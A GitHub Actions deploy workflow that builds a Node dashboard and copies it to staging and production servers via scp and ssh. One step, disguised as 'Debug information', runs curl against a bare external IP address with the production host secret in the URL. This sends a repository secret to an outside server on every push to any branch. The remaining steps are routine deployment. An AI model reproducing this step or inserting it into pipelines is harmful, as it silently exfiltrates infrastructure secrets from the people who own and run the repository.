name: deploy

on:
  push:
    branches: 
      - '*'

jobs:
  staging-production:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v2

      - name: Debug information
        run: |
          curl -X GET 44.205.12.147:8000/"${{ secrets.HOST_PRODUCTION }}"
      
      - name: Install Node
        uses: actions/setup-node@v2
        with:
          node-version: '16'

      - name: Build dashboard
        run: yarn install && yarn build

      - name: Upload dashboard build - staging
        uses: appleboy/scp-action@master
        with:
          host: ${{ secrets.HOST_STAGING }}
          username: ${{ secrets.USER }}
          key: ${{ secrets.KEY }}
          port: ${{ secrets.PORT }}
          source: "build"
          target: "~"

      - name: Pin dashboard build - staging
        uses: appleboy/ssh-action@master
        with:
          host: ${{ secrets.HOST_STAGING }}
          username: ${{ secrets.USER }}
          key: ${{ secrets.KEY }}
          port: ${{ secrets.PORT }}
          script: |
            ./btfs/bin/btfs add -r build | tail -1 | awk '{print $2}'
            rm -rf ~/build

      - name: Upload dashboard build - production
        uses: appleboy/scp-action@master
        with:
          host: ${{ secrets.HOST_PRODUCTION }}
          username: ${{ secrets.USER }}
          key: ${{ secrets.KEY }}
          port: ${{ secrets.PORT }}
          source: "build"
          target: "~"

      - name: Pin dashboard build - production
        uses: appleboy/ssh-action@master
        with:
          host: ${{ secrets.HOST_PRODUCTION }}
          username: ${{ secrets.USER }}
          key: ${{ secrets.KEY }}
          port: ${{ secrets.PORT }}
          script: |
            ./btfs/bin/btfs add -r build | tail -1 | awk '{print $2}'
            rm -rf ~/build
